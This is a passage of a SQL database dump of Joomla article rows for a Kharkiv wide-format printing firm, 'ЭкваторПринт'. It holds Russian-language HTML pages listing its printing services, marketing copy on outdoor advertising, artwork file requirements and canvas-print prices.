href=\"index.php?option=com_content&amp;view=article&amp;id=8&amp;Itemid=9\" title=\"баннер печать\"><img src=\"images/stories/banner-s.jpg\" border=\"0\" /></a></p>\r\n</td>\r\n<td></td>\r\n<td style=\"width: 100px;\">\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=9&amp;Itemid=10\" title=\"печать на сетке баннерной\"><img src=\"images/stories/setka-s.jpg\" border=\"0\" /></a></p>\r\n</td>\r\n<td></td>\r\n<td>\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=18&amp;Itemid=19\" title=\"печать бигбордов\"><img src=\"images/stories/pechat-bigbordov.jpg\" border=\"0\" alt=\"печать билбордов бигбордов\" title=\"печать билбордов\" /></a></p>\r\n</td>\r\n<td></td>\r\n<td style=\"width: 100px;\">\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=11&amp;Itemid=12\" title=\"изготовление наружной рекламы\"><img src=\"images/stories/narugnaja-kreativ-reklama-s.jpg\" border=\"0\" /></a></p>\r\n</td>\r\n</tr>\r\n<tr style=\"background-color: #99ccff;\">\r\n<td style=\"text-align: center;\"><span style=\"color: #000000;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=6&amp;Itemid=7\" title=\"печать на холсте\">Печать на холсте</a></span></td>\r\n<td style=\"background-color: #ffffff;\"></td>\r\n<td style=\"text-align: center;\"><span style=\"color: #000000;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=7&amp;Itemid=8\" title=\"печать на виниле\">Печать на виниле, самоклейке </a></span></td>\r\n<td style=\"background-color: #ffffff;\"></td>\r\n<td style=\"text-align: center;\"><span style=\"color: #000000;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=8&amp;Itemid=9\" title=\"баннер печать\">Баннер печать</a></span></td>\r\n<td style=\"background-color: #ffffff;\"></td>\r\n<td style=\"text-align: center;\"><span style=\"color: #000000;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=9&amp;Itemid=10\" title=\"печать на сетке баннерной\">Печать на сетке баннерной</a></span></td>\r\n<td style=\"background-color: #ffffff;\"></td>\r\n<td style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=18&amp;Itemid=19\" title=\"печать билбордов бигбордов\">Печать билбордов</a></td>\r\n<td style=\"background-color: #ffffff;\"></td>\r\n<td style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=11&amp;Itemid=12\" title=\"изготовление наружной рекламы\">Изготовление наружной рекламы</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"tbl_main_page\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr style=\"height: 10px;\">\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr valign=\"top\">\r\n<td style=\"width: 100px;\">\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=10&amp;Itemid=11\"><img src=\"images/stories/photo.jpg\" border=\"0\" alt=\"печать больших фотографий\" title=\"печать больших фотографий\" /></a></p>\r\n</td>\r\n<td></td>\r\n<td style=\"width: 100px;\">\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=13&amp;Itemid=14\" title=\"печать фотообоев\"><img src=\"images/stories/zakat-100.jpg\" border=\"0\" /></a></p>\r\n</td>\r\n<td></td>\r\n<td style=\"width: 100px;\">\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=14&amp;Itemid=15\" title=\"печать флагов\"><img src=\"images/stories/flag.jpg\" border=\"0\" /></a></p>\r\n</td>\r\n<td></td>\r\n<td style=\"width: 100px;\">\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=15&amp;Itemid=16\" title=\"печать ситилайтов\"><img src=\"images/stories/sitilajt.jpg\" border=\"0\" /></a></p>\r\n</td>\r\n<td></td>\r\n<td>\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=16&amp;Itemid=17\"><img src=\"images/stories/potolok-gl.jpg\" border=\"0\" width=\"100\" height=\"123\" /></a></p>\r\n</td>\r\n<td></td>\r\n<td>\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=17&amp;Itemid=18\"><img src=\"images/stories/tent.jpg\" border=\"0\" width=\"100\" height=\"123\" /></a></p>\r\n</td>\r\n</tr>\r\n<tr style=\"background-color: #99ccff;\">\r\n<td style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=10&amp;Itemid=11\" title=\"печать больших фотографий\">Печать больших фотографий</a></td>\r\n<td style=\"background-color: #ffffff;\"></td>\r\n<td style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=13&amp;Itemid=14\" title=\"печать фотообоев Харьков\">Печать фотообоев</a></td>\r\n<td style=\"background-color: #ffffff;\"></td>\r\n<td style=\"text-align: center;\"><span style=\"color: #000000;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=14&amp;Itemid=15\" title=\"широкоформатная печать флагов\">Печать флагов</a><br /></span></td>\r\n<td style=\"background-color: #ffffff;\"></td>\r\n<td style=\"text-align: center;\"><span style=\"color: #000000;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=15&amp;Itemid=16\" title=\"широкоформатная печать сити лайтов\">Печать сити лайтов</a></span></td>\r\n<td style=\"background-color: #ffffff;\"></td>\r\n<td style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=16&amp;Itemid=17\" title=\"печать на натяжных потолках\">Печать на натяжных<br /> потолках</a></td>\r\n<td style=\"background-color: #ffffff;\"></td>\r\n<td style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=17&amp;Itemid=18\">Печать на тенте</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"width: 600px;\" border=\"0\" cellpadding=\"10\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p><img src=\"images/stories/kraski.jpg\" border=\"0\" alt=\"широкоформатная печать Харьков\" title=\"широкоформатная печать Харьков\" width=\"50\" style=\"float: left; margin-top: 5px; margin-bottom: 5px; border: 0pt none;\" /></p>\r\n<h2 style=\"text-align: center;\">Широкоформатная печать в \"ЭкваторПринт\"</h2>\r\n<div style=\"border:3px solid #FFF300;padding:5px;background:#d8f6fe;color:#000;\">\r\n<p style=\"font-size:14px;font-weight:bolder;\">Наши преимущества:</p>\r\n<ol>\r\n<li>1. Благодаря чернилам предназначенным для наружной рекламы, наши изделия имеют      <strong>длительный срок эксплуатации</strong> при наружном применении. </li>\r\n<li>2. Точная цветопередача и яркие <strong>насыщенные цвета</strong>.</li>\r\n<li>3. Максимально <strong>короткие сроки</strong> выполнения заказа</li>\r\n<li>4. Высококачественные <strong>проверенные материалы</strong></li>\r\n</ol></div>\r\n<p style=\"text-align: justify;\"><strong>Широкоформатная печать</strong> - это цифровая многокрасочная цветная печать на рулонных материалах. В Харькове и других городах Украины она активно используется для изготовления наружной рекламы, при оформлении интерьеров помещений, на выставках.</p>\r\n<p style=\"text-align: justify;\">\"<strong>ЭкваторПринт</strong>\"  - это лучший путь выполнения заказа, если вам необходимо выполнить <strong>широкоформатную печать  на каком-либо виде рулонных материалов</strong>: на холсте, на пленке, на сетке, на самоклейке, на баннерной ткани, изготовить фотообои, флаги и ситилайтов.</p>\r\n<p style=\"text-align: justify;\">Мы любим своих клиентов, поэтому предлагаем высокое качество, быстрые сроки выполнения заказа и приемлемые цены.</p>\r\n<p>Если у Вас появилась потребность в печати и Вы хотите чтоб все было надежно, качественно и в срок, обращайтесь к нам.</p>\r\n<h3 style=\"text-align: center;\">Широкоформатная печать – преимущества наружной рекламы</h3>\r\n<p style=\"text-align: justify;\">В Харькове - наружная реклама наиболее удобный и выгодный путь рекламы услуг, товаров, работ. Преимущества ясны и понятны.</p>\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/1.gif\" border=\"0\" width=\"50\" height=\"80\" style=\"float: left; margin-left: 5px; margin-right: 5px;\" /><span style=\"font-size: medium;\"><span style=\"color: #0000ff;\">Охват миллионной аудитории.</span></span><br />Яркие, большие и броские постеры, баннеры, вывески, билбоды, ситилайты – создают бренд компании, поддерживают ее имидж, и успешно рекламируют ваш продукт в городе миллионере.</p>\r\n<p><img src=\"images/stories/2.gif\" border=\"0\" width=\"50\" height=\"80\" style=\"float: left; margin-left: 5px; margin-right: 5px;\" /><span style=\"font-size: medium;\"><span style=\"color: #0000ff;\">Интерьерное оформление и реклама.</span></span><br />В качестве интерьерной рекламы, продукция широкофрматной печати также эффективна, она выступает и как элемент корпоративного стиля, а вместе с тем поддерживает интерес к компании и увеличивает количество клиентов и партнеров.</p>\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/3.gif\" border=\"0\" width=\"50\" height=\"80\" style=\"float: left; margin-left: 5px; margin-right: 5px;\" /><span style=\"color: #0000ff;\"><span style=\"font-size: medium;\">Повышает узнаваемость бренда.</span></span><br />Каким бы видом деятельности вы не занимались, офф-лайновая реклама всегда будет вам «на руку». Ведь каждый, проходящий мимо ваших \"вывесок\", подсознательно, сам того не замечая, <strong>запоминает вашу фирму</strong>, логотип компании, и ваш товар/услугу. И при случае необходимости, представ перед выбором компании, он обратится в ту, которая ему уже знакома.</p>\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/4.gif\" border=\"0\" width=\"50\" height=\"80\" style=\"float: left; margin-left: 5px; margin-right: 5px;\" /><span style=\"font-size: medium;\"><span style=\"color: #0000ff;\">Выгодно.</span></span><br />Размещаю наружную рекламу, вы получаете сравнительно <strong>не дорогой способ рекламы</strong>. При малой себестоимости, такая рекламная продукция имеет высокое качество, она практична и прослужит долгий период времени с сохранением яркого и четкого внешнего вида.</p>\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/5.gif\" border=\"0\" width=\"50\" height=\"80\" style=\"float: left; margin-left: 5px; margin-right: 5px;\" /><span style=\"font-size: medium;\"><span style=\"color: #0000ff;\">Круглосуточно</span></span><br /><strong>Широкоформатная печать</strong> это путь сделать презентацию вашего товара/услуги круглосуточной. Ведь жизнь в городе <strong>Харьков</strong> насыщенна, и разместив баннер, ситилайт, билборд или другую наружную рекламу в удачном месте – вас увидят сотни тысяч прохожих  и проезжих. А поскольку Харьков активен и днем и ночью – то широкоформатная печать 100% выполняет свои функции <strong>круглосуточно</strong>.</p>\r\n<ul>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"width: 330px; clear: both;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=1&amp;Itemid=2\"><img src=\"images/stories/printer.png\" border=\"0\" alt=\"print\" width=\"50\" height=\"50\" style=\"border: 0pt none;\" /><br /></a>\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=1&amp;Itemid=2\">Оборудование</a></p>\r\n</td>\r\n<td style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=2&amp;Itemid=3\" title=\"широкоформатная печать Харьков цена\"><img src=\"images/stories/Documents.png\" border=\"0\" alt=\"doc\" width=\"50\" height=\"50\" style=\"border: 0pt none;\" /><br /></a>\r\n<p><a href=\"index.php?option=com_content&amp;view=article&amp;id=2&amp;Itemid=3\" title=\"широкоформатная печать Харьков цена\">Прайс-лист</a></p>\r\n</td>\r\n<td style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=3&amp;Itemid=4\"><img src=\"images/stories/Map.png\" border=\"0\" alt=\"map\" width=\"50\" height=\"50\" style=\"border: 0pt none;\" /></a>\r\n<p><a href=\"index.php?option=com_content&amp;view=article&amp;id=3&amp;Itemid=4\">Контакты</a></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,0,'2010-11-06 16:25:59',62,'','2015-01-29 07:10:35',62,0,'0000-00-00 00:00:00','2010-11-06 16:25:59','0000-00-00 00:00:00','','','show_title=0\nlink_titles=0\nshow_intro=0\nshow_section=0\nlink_section=0\nshow_category=0\nlink_category=0\nshow_vote=0\nshow_author=0\nshow_create_date=0\nshow_modify_date=0\nshow_pdf_icon=0\nshow_print_icon=0\nshow_email_icon=0\nlanguage=\nkeyref=\nreadmore=',137,0,24,'широкоформатная печать, широкоформатная печать харьков, широкоформатная печать днепропетровск, широкоформатная печать симферополь, широкоформатная печать запорожье, широкоформатная печать донецк, широкоформатная печать одесса','Широкоформатная печать: быстро, большой выбор рулонных материалов, сварка баннерной ткани - доставка по Украине. Широкоформатная печать: Харьков, Днепропетровск, Запорожье, Донецк, Симферополь и др. ',0,88783,'robots=\nauthor='),(26,'Требования к макету','2015-10-13-12-03-19','','<p> </p>\r\n<p> </p>\r\n<table style=\"width: 758px;\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\">\r\n<tbody>\r\n<tr height=\"24\">\r\n<td style=\"text-align: center; height: 24px; background-color: #172983;\" colspan=\"4\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong><span style=\"font-size: large;\">ТРЕБОВАНИЯ К МАКЕТАМ</span></strong></span></span></td>\r\n</tr>\r\n<tr height=\"17\">\r\n<td style=\"text-align: center;\" height=\"17\"><span style=\"font-size: small;\"><strong>1</strong></span></td>\r\n<td colspan=\"3\"><span style=\"color: #000000;\"><span style=\"font-size: medium;\">Файлы принимаются в формате TIF (Adobe Photoshop)</span><br /></span></td>\r\n</tr>\r\n<tr height=\"17\">\r\n<td style=\"text-align: center;\" height=\"17\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">2</span></strong></span></td>\r\n<td colspan=\"3\"><span style=\"color: #000000;\"><span style=\"font-size: medium;\">Макет должен быть в реальном размере (1:1)</span><br /></span></td>\r\n</tr>\r\n<tr height=\"17\">\r\n<td style=\"text-align: center;\" height=\"17\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">3</span></strong></span></td>\r\n<td colspan=\"3\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\">Все слои в макете должны быть сведены</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">4</span></strong></span></td>\r\n<td colspan=\"3\"><span style=\"font-size: small;\"><span style=\"color: #333333;\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\">Разрешение в макете для печати интерьерной рекламы должно быть до 200 пикс./дюйм, для наружной рекламы - до 70 пикс./дюйм.</span></span></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">5</span></strong></span></td>\r\n<td colspan=\"3\">\r\n<p><span style=\"font-size: small;\"><span style=\"color: #333333;\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\">Названия файлов должны подписываться в следующем порядке: кол-во штук, материал, размер, дополнительные услуги.</span></span></span></span></p>\r\n<p><span style=\"color: #000000;\"><span style=\"font-size: small;\"><span style=\"font-size: medium;\">К примеру: <em>2шт_пленкаFotoJet_60x60см_обрезка по периметру</em>, </span></span><span style=\"font-size: medium; line-height: 1.3em;\">или </span><em style=\"font-size: medium; line-height: 1.3em;\">3шт_баннер литой_100х150см_подворот_люверсы 30см по периметру.</em></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">6</span></strong></span></td>\r\n<td colspan=\"3\">\r\n<p><span style=\"font-size: medium;\"><span style=\"color: #000000;\">При сохранении макета рекомендуется использовать </span><em style=\"font-size: medium; line-height: 1.3em;\"><span style=\"color: #000000;\">сжатие LZW</span></em></span></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,0,'2015-10-13 12:01:26',62,'','2015-10-13 18:01:35',62,62,'2015-10-20 07:16:42','2015-10-13 12:01:26','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',5,0,2,'','',0,647,'robots=\nauthor='),(5,'Услуги','2010-12-01-14-37-59','','<h3 style=\"text-align: center;\"><strong>Широкоформатная печать на рулонных материалах:</strong></h3>\r\n<table border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr style=\"height: 20px;\">\r\n<td style=\"background-color: #99ccff;\"></td>\r\n<td></td>\r\n<td style=\"background-color: #99ccff;\"></td>\r\n<td></td>\r\n<td style=\"background-color: #99ccff;\"></td>\r\n<td></td>\r\n<td style=\"background-color: #99ccff;\"></td>\r\n<td></td>\r\n<td style=\"background-color: #99ccff;\"></td>\r\n</tr>\r\n<tr valign=\"top\">\r\n<td style=\"width: 120px;\">\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=6&amp;Itemid=7\" title=\"печать на холсте\"><img src=\"images/stories/xolst.jpg\" border=\"0\" /></a></p>\r\n</td>\r\n<td></td>\r\n<td style=\"width: 120px;\">\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=7&amp;Itemid=8\" title=\"печать на виниле\"><img src=\"images/stories/vinil-s.jpg\" border=\"0\" style=\"border: 1px solid grey;\" /></a></p>\r\n</td>\r\n<td></td>\r\n<td style=\"width: 120px;\">\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=8&amp;Itemid=9\" title=\"баннер печать\"><img src=\"images/stories/banner-s.jpg\" border=\"0\" style=\"border: 1px solid grey;\" /></a></p>\r\n</td>\r\n<td></td>\r\n<td style=\"width: 120px;\">\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=9&amp;Itemid=10\" title=\"печать на сетке баннерной\"><img src=\"images/stories/setka-s.jpg\" border=\"0\" style=\"border: 1px solid grey\" /></a></p>\r\n</td>\r\n<td></td>\r\n<td>\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=18&amp;Itemid=19\" title=\"печать бигбордов\"><img src=\"images/stories/pechat-bigbordov.jpg\" border=\"0\" alt=\"печать билбордов бигбордов\" title=\"печать билбордов\" style=\"border: 1px solid grey;\" /></a></p>\r\n</td>\r\n</tr>\r\n<tr style=\"background-color: #99ccff;\">\r\n<td style=\"text-align: center;\"><span style=\"color: #000000;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=6&amp;Itemid=7\" title=\"печать на холсте\">Печать на холсте</a></span></td>\r\n<td style=\"background-color: #ffffff;\"></td>\r\n<td style=\"text-align: center;\"><span style=\"color: #000000;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=7&amp;Itemid=8\" title=\"печать на виниле\">Печать на виниле, самоклейке</a></span><span style=\"color: #000000;\"><br /></span></td>\r\n<td style=\"background-color: #ffffff;\"></td>\r\n<td style=\"text-align: center;\"><span style=\"color: #000000;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=8&amp;Itemid=9\" title=\"баннер печать\">Баннер печать</a></span></td>\r\n<td style=\"background-color: #ffffff;\"></td>\r\n<td style=\"text-align: center;\"><span style=\"color: #000000;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=9&amp;Itemid=10\" title=\"печать на сетке баннерной\">Печать на сетке баннерной</a></span></td>\r\n<td style=\"background-color: #ffffff;\"></td>\r\n<td><a href=\"index.php?option=com_content&amp;view=article&amp;id=18&amp;Itemid=19\" title=\"печать билбордов\">Печать билбордов</a> <br /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr style=\"height: 10px;\">\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr valign=\"top\">\r\n<td></td>\r\n<td style=\"width: 120px;\">\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=13&amp;Itemid=14\" title=\"печать фотообоев\"><img src=\"images/stories/zakat-100.jpg\" border=\"0\" style=\"border: 1px solid grey;\" /></a></p>\r\n</td>\r\n<td></td>\r\n<td style=\"width: 120px;\">\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=14&amp;Itemid=15\" title=\"печать флагов\"><img src=\"images/stories/flag.jpg\" border=\"0\" style=\"border: 1px solid grey;\" /></a></p>\r\n</td>\r\n<td></td>\r\n<td style=\"width: 120px;\">\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=15&amp;Itemid=16\" title=\"печать ситилайтов\"><img src=\"images/stories/sitilajt.jpg\" border=\"0\" style=\"border: 1px solid grey;\" /></a></p>\r\n</td>\r\n<td></td>\r\n<td>\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=16&amp;Itemid=17\"><img src=\"images/stories/potolok-gl.jpg\" border=\"0\" width=\"100\" height=\"123\" style=\"border: 1px solid grey;\" /></a></p>\r\n</td>\r\n<td></td>\r\n<td>\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=17&amp;Itemid=18\"><img src=\"images/stories/tent.jpg\" border=\"0\" width=\"100\" height=\"123\" style=\"border: 1px solid grey;\" /></a></p>\r\n</td>\r\n</tr>\r\n<tr style=\"background-color: #99ccff;\">\r\n<td style=\"background-color: #ffffff;\"></td>\r\n<td style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=13&amp;Itemid=14\" title=\"печать фотообоев Харьков\">Печать фотообоев</a></td>\r\n<td style=\"background-color: #ffffff;\"></td>\r\n<td style=\"text-align: center;\"><span style=\"color: #000000;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=14&amp;Itemid=15\" title=\"широкоформатная печать флагов\">Печать флагов</a><br /></span></td>\r\n<td style=\"background-color: #ffffff;\"></td>\r\n<td style=\"text-align: center;\"><span style=\"color: #000000;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=15&amp;Itemid=16\" title=\"широкоформатная печать сити лайтов\">Печать сити лайтов</a></span></td>\r\n<td style=\"background-color: #ffffff;\"></td>\r\n<td style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=16&amp;Itemid=17\" title=\"печать на натяжных потолках\">Печать на натяжных<br /> потолках</a></td>\r\n<td style=\"background-color: #ffffff;\"></td>\r\n<td style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=17&amp;Itemid=18\">Печать на тенте</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr valign=\"top\">\r\n<td style=\"width: 350px;\">\r\n<h3 style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=11&amp;Itemid=12\" title=\"Изготовление наружной рекламы\"><strong>Изготовление наружной рекламы</strong></a></h3>\r\n</td>\r\n<td>\r\n<h3 style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=10&amp;Itemid=11\" title=\"печать больших фотографий\"><strong>Печать больших фотографий</strong></a></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: left;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=11&amp;Itemid=12\" title=\"изготовление наружной рекламы\"><img src=\"images/stories/narugnaja-kreativ-reklama-s.jpg\" border=\"0\" style=\"border: 1px solid black; float: left; margin-left: 10px; margin-right: 10px;\" /></a>Мы обеспечим Вам качественное <strong>изготовление наружной рекламы</strong>:   изготовление баннера и изготовление вывесок. Ваша реклама на улицах, на   билбордах, на магазинах будет яркой, сочной и привлекательной.</td>\r\n<td style=\"text-align: left;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=10&amp;Itemid=11\"><img src=\"images/stories/photo.jpg\" border=\"0\" alt=\"печать больших фотографий\" title=\"печать больших фотографий\" style=\"border: 1px solid grey; float: left; margin-left: 10px; margin-right: 10px;\" /></a><strong>Печать больших фотографий</strong> на нашем оборудовании обеспечит точную цветопередачу и высокое качество изображения.</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p> </p>\r\n<p>Интересно о:</p>\r\n<p>- <a href=\"index.php?option=com_content&amp;view=article&amp;id=12&amp;Itemid=13\" title=\"цифровая печать Харьков\">Что такое цифровая печать</a></p>\r\n</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,0,'2010-12-01 14:37:41',62,'','2012-01-11 12:52:01',62,62,'2014-08-27 10:33:16','2010-12-01 14:37:41','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',72,0,23,'широкоформатная печать Харьков, изготовление наружной рекламы, печать больших фотографий.','Широкоформатная печать на рулонных материаллах: холст, винил, пленка, баннер, сетка. Изготовление наружной рекламы. Печать больших фотографий.',0,9807,'robots=\nauthor='),(6,'Печать на холсте','print','','<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr style=\"text-align: justify;\">\r\n<td colspan=\"4\">\r\n<h1 style=\"text-align: center;\">Печать на холсте <span style=\"color: #0000ff;\">(ФОТОКАЧЕСТВО)</span></h1>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p><img src=\"images/stories/pechat_na_holste.jpg\" border=\"0\" alt=\"Печать на Холсте\" title=\"Печать на Холсте, натяжка на подрамник\" width=\"242\" height=\"242\" style=\"float: left; border: 0px none;\" /></p>\r\n</td>\r\n<td>\r\n<p><span style=\"font-size: medium;\"><span style=\"color: #0000ff;\">Стоимость готовых картин на холсте<br /> натянутых на подрамник:</span></span></p>\r\n<p><span style=\"font-size: small;\">(приведены некоторые <strong>стандартные</strong> размеры. <br />Вы можете <strong>заказать картинку любого размера</strong>)</span></p>\r\n<table style=\"width: 100%;\" border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 45%;\"><span style=\"font-size: medium;\"><span style=\"font-size: small;\"><span style=\"font-size: small; line-height: normal; vertical-align: baseline; outline: 0px; padding: 0px; margin: 0px; border: 0px; color: #666666; font-family: Verdana, Arial, Helvetica, sans-serif; text-align: justify;\">20х30см–<strong style=\"vertical-align: baseline; font-size: 13px; outline: 0px; padding: 0px; margin: 0px; border: 0px;\">87 грн.</strong><br />30х30см–<strong style=\"vertical-align: baseline; font-size: 13px; outline: 0px; padding: 0px; margin: 0px; border: 0px;\">104 грн.</strong><br />30х40см–<strong style=\"vertical-align: baseline; font-size: 13px; outline: 0px; padding: 0px; margin: 0px; border: 0px;\">122 грн.</strong><br />40х50см–<strong style=\"vertical-align: baseline; font-size: 13px; outline: 0px; padding: 0px; margin: 0px; border: 0px;\">162 грн.</strong><br />40х60см–<strong style=\"vertical-align: baseline; font-size: 13px; outline: 0px; padding: 0px; margin: 0px; border: 0px;\">182 грн.</strong><br />50х70см–<strong style=\"vertical-align: baseline; font-size: 13px; outline: 0px; padding: 0px; margin: 0px; border: 0px;\">229 грн.</strong><br />60х90см–<strong style=\"vertical-align: baseline; font-size: 13px; outline: 0px; padding: 0px; margin: 0px; border: 0px;\">307 грн.</strong><br /> </span></span></span></td>\r\n<td style=\"width: 2%;\"></td>\r\n<td style=\"width: 53%; vertical-align: top;\">\r\n<div style=\"text-align: start;\"><span style=\"color: #666666; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: small; line-height: normal; text-align: justify;\">80х80см<span style=\"color: #666666; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: small; line-height: normal; text-align: justify;\">–</span></span><strong style=\"vertical-align: baseline; font-size: medium; outline: 0px; padding: 0px; margin: 0px; border: 0px; color: #666666; font-family: Verdana, Arial, Helvetica, sans-serif; line-height:normal; text-align: justify;\"><span style=\"vertical-align: baseline; font-size: small; outline: 0px; padding: 0px; margin: 0px; border: 0px;\">342 грн.</span></strong><span style=\"color: #222222; font-family: arial, sans-serif; font-size: 13px; line-height: normal;\"> </span></div>\r\n<span style=\"font-size: small; line-height: normal; vertical-align: baseline; outline: 0px; padding: 0px; margin: 0px; border: 0px; color: #666666; font-family: Verdana, Arial, Helvetica, sans-serif; text-align: justify;\">75х100см–<strong style=\"vertical-align: baseline; font-size: 13px; outline: 0px; padding: 0px; margin: 0px; border: 0px;\">384 грн.</strong><br />100х100см–<strong style=\"vertical-align: baseline; font-size: 13px; outline: 0px; padding: 0px; margin: 0px; border: 0px;\">472 грн.</strong><br />100х120см–<strong>656 </strong><strong style=\"vertical-align: baseline; font-size: 13px; outline: 0px; padding: 0px; margin: 0px; border: 0px;\">грн.<br /></strong>100х140см<span style=\"color: #666666; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: small; line-height: normal; text-align: justify;\">–</span><strong>739 грн.</strong><br />200х200см–<strong style=\"vertical-align: baseline; font-size: 13px; outline: 0px; padding: 0px; margin: 0px; border: 0px;\">1455 грн.</strong></span><br 